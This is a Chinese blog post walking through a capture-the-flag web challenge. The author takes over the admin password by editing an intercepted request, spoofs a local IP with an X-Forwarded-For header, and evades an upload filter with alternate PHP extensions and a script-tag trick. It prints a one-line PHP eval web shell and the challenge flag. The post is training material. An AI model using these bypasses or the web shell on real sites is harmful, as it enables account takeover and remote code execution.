ctf之bug

最新推荐文章于 2024-08-20 11:15:52 发布
最新推荐文章于 2024-08-20 11:15:52 发布
阅读量325 收藏
点赞数 10
分类专栏: ctf 文章标签: bug 网络安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74263993/article/details/136953711
版权
本文讲述了作者通过尝试注册、抓包操作、破解密码和发现文件上传漏洞的过程,最终揭示了XSS和PHP后缀检测的绕过方法,以获得flag。重点在于越权操作及安全漏洞的利用技巧。
摘要由CSDN通过智能技术生成

在观察一圈后没有发现可以直接利用的漏洞后,只能先注册一个账号试试,却发现admin账号被注册了(不用猜就是管理员账号),然后随便注册一个

登录成功后发现Manage不能用说我不是admin

那便尝试抓包越权改密码,在更改自己账号密码的·时候用brupsuit抓包

然后把账号改为admin

结果发现改密成功

登录admin发现Manage还是不能查看,说什么IP不对

那便再进行抓包伪造ip,点击Manage并抓包添加一行x-forwarded-for:127.0.0.1

结果发现还是没有flag哈哈哈!!!

查看这个页面的源码发现有个

index.php?module=filemanage&do=???

ctf总共就几个知识点,猜测xss,sql,ssrf,upload

果不其然是upload,又是文件上传漏洞

通过上传文件发现只能上传图片文件,并且对抓包修改成php后缀也进行了过滤,甚至对文件里的内容也进行了检查不能是PHP语言的格式。

那我们需要绕过的东西就有俩个了:

1.php后缀检测绕过,可以通过改成php5,php4,Php5,PHP5,等等绕过

2.PHP语言检测绕过,可以通过<script language='php'>123</script>绕过

其实这个题目只要你成功上传了一个PHP文件就能得到flag

flag:cyberpeace{dd8d401f5b43520d07e98de11a5c2484}')

本来想上传一个木嘛<script language='php'>@eval(_POST["aaa"])</script>尝试用蚁剑连接,结果发现压根就没有存文件的地方,检测上传php文件成功就出flag了

本题主要考察越权操作和上传绕过

小黑子不会打篮球
关注
  • 10
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF-bugkuctf-杂项
xiaonuanhu的博客
03-17 113
1.隐写 压缩包解压,里面有一个图片,图片可以打开,使用python脚本对宽高进行测试,发现高被修改, 修改图片的高后问题解决 python脚本: import os import binascii import struct crcbp = open("CTF\\2.png","rb").read() for i in range(1024): for j in range(1024): data = crcbp[12:16] + struct.pack('>i',i) +
ctfbug——WEB2
weixin_40980428的博客
03-22 517
打开链接后有种眼花缭乱的感觉,是不是对这个感到很好玩呢我们快速的按下F12查看源代码,然后so easy的看到flag就在这,哈哈
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 769
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
CTF BugKu平台——Crypto篇刷题记录(后续更新)
Aluxian_的博客
05-31 3104
CTF BugKu平台——Crypto篇抄错的字符 抄错的字符 描述: 老师让小明抄写一段话,结果粗心的小明把部分数字抄成了字母,还因为强迫症把所有字母都换成大写。你能帮小明恢复并解开答案吗:QWIHBLGZZXJSXZNVBZW QW1h base64解码为 Ama BL92 base64解码为 _v ZXJ5 base64解码为 ery X2Nv base64解码为 _co b2w= base64解码为 ol flag{Aman_very_cool} 这题出的确实好u1s1 出题人完胜! ...
文件包含漏洞 基础
weixin_50464560的博客
03-21 925
CTF中文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据allow_...
CTF之二维码扫描.7z
12-02
这个"CTF之二维码扫描.7z"压缩包显然与CTF比赛中的一个环节有关,即二维码扫描。二维码在现代生活中无处不在,它们可以存储各种信息,如网址、文本、联系人信息等。在CTF竞赛中,二维码可能被用作隐藏线索或加密信息...
CTF之GIF图片分离工具
02-23
misc方向直接GIF图片分离
CTF哥斯拉冰蝎解码工具
02-23
承影_哥斯拉冰蝎解码工具1.1版本,助力CTF比赛
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出题人申请重新对过渡进行修改发布的权利,但对每个题均标明了出处,如涉嫌犯罪,立马致歉删除。 对于部分没找到flag的翻译,会自己随便添加 对已提供Dockerfile...
CTF
03-10
周大福 麒麟在CTF游戏中的写作。
BugkuCTF——web篇writeup(持续更新)
热门推荐
过客璇璇的博客
03-23 6万+
BugkuCTF——web篇writeup 平台网址:http://ctf.bugku.com/ 平台首页: web2 网址链接:http://120.24.86.145:8002/web2/ 页面: 一看只有好多滑稽,分数也不太高,应该不是很难,F12打开开发者工具看一下 得到ctf:flag KEY{Web-2-bugKssNNikls9100} 文件上传测试 链...
bugkuCTF——猫片(安恒)
灬彬的博客
08-07 1万+
                             bugku昨天才更新的这道题,先将文件下载下来并改后缀png, 通常做图片隐写的题,大概都是先右键查看属性,看下有没有一些特殊的信息,没有就放binwalk看下有没有隐藏什么文件,又或者直接stegsolve分析一波,这题一开始我都试了一遍,无果。但是总不能就这样放弃吧,应该还是漏了点东西。然后折腾了快一个小时,好像有点发现, ...
bugku ctf 点击一百万次 (hints:JavaScript)
qq_42777804的博客
08-15 3873
打开吧,这个题看了好久                     之前下了一个单击软件帮忙点   但是一百万那也不知道什么时候   有的教程 说是让用 postman  , 但是怎么使用  跟你说了吗    安装我都不会 所以还是用我们的   火狐   就在火狐的插件里面  hackbar   安装十分简单   之后 划重点了啊啊啊啊啊啊啊 在post中输入  cli...
BugKuCTF(CTF-练习平台)——WEB-矛盾
Ifish的博客
02-25 1万+
打开网址 查找is_numeric函数 即num既不能是数字字符,但是要等于1 我们可以想到用科学计数法表示数字1,既不是纯数字,其值又等于1 因此,构造payload num=1*e*0.1 可以得到flag ...
ctf bugku wirteup 简单个人信息收集
成长之路
06-23 1万+
简单个人信息收集 一、下载压缩包1.zip。  本来想用爆破的,但是爆破了半个小时没跑出来密码,感觉可能不是爆破,就是试了一下是不是zip伪加密,发现果然是伪加密(不会破解zip伪加密的同学,推荐这篇博客http://blog.csdn.net/pdsu161530247/article/details/73612910,里面有讲解怎么破解zip伪加密)。 二、解开后,打开压缩包
bugkuctf web基础部分 writeup
river
03-20 2875
Bugku-ctf-web 管理员系统 随便输入用户名和密码提示 窗体顶端 窗体底端 IP禁止访问,请联系本地管理员登陆,IP已被记录. 明显需要伪造允许登录的IP 知识点: XFF头(X-Forwarded-For),代表客户端,也就是HTTP的请求端真实的IP。有两种方式可以从HTTP请求中获得请求者的IP地址。一个是从Remote Address中获得,另一个是从X-Forward-For中...
CTF -bugku-misc(持续更新直到全部刷完)
aon8069924165211的博客
08-29 2056
1.签到题 点开可见。(这题就不浪费键盘了) CTF- 2.这是一张单纯的图片 图片保存到本地,老规矩,winhex看一看 拉到最后发现 因为做过ctf新手的密码 所以一看就知道unicode 百度站长工具有解码的 可能是我复制出了问题不过答案很明显了key{you are right} 3.隐写 点开题目是压缩包...
BugKuCTF-杂项-writeup 大全?
疯狂棒棒糖的博客
06-20 1万+
最近玩了一个 CTF 的练习平台-----BugkuCTF下面会把一些题目的方法记录下来先讲一下杂项1.签到题只要关注公众号就可以得到 flag---开胃菜2.这是一张单纯的图片网站上打开是无法加载,将图片保存到本地是个小兔子,然后用编辑器打开图片,发现了最下面一行的 unicode 编码,解密就有 flag...
8.19 day pre-bug
最新发布
qq_30898861的博客
08-20 309
实在没bug了,只能改成prevent-bug,预防bug今天复习了很多sql的部分,还有很多没POST上来,果真是。
ctf之bsp文件分享
10-02
ctf之bsp文件分享是一种常见的技术手段,用于在计算机安全领域进行攻击和渗透测试。它的原理是将恶意代码隐藏在一个看似正常的文件中,如图片、文档等,利用文件的解析漏洞或执行特定操作后,执行恶意代码实现攻击目标。具体步骤如下: 1. 首先,选择一个恶意代码(例如木马程序)和一个合法文件(如图片、文档)。 2. 将恶意代码和合法文件用压缩软件(如WinRAR)打包成RAR文件。 3. 将RAR文件的后缀名改为exe,以便在执行时被误认为是可执行文件。 4. 将生成的exe文件发送给目标用户。 5. 当目标用户双击exe文件时,会自动解压并运行其中的恶意代码。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值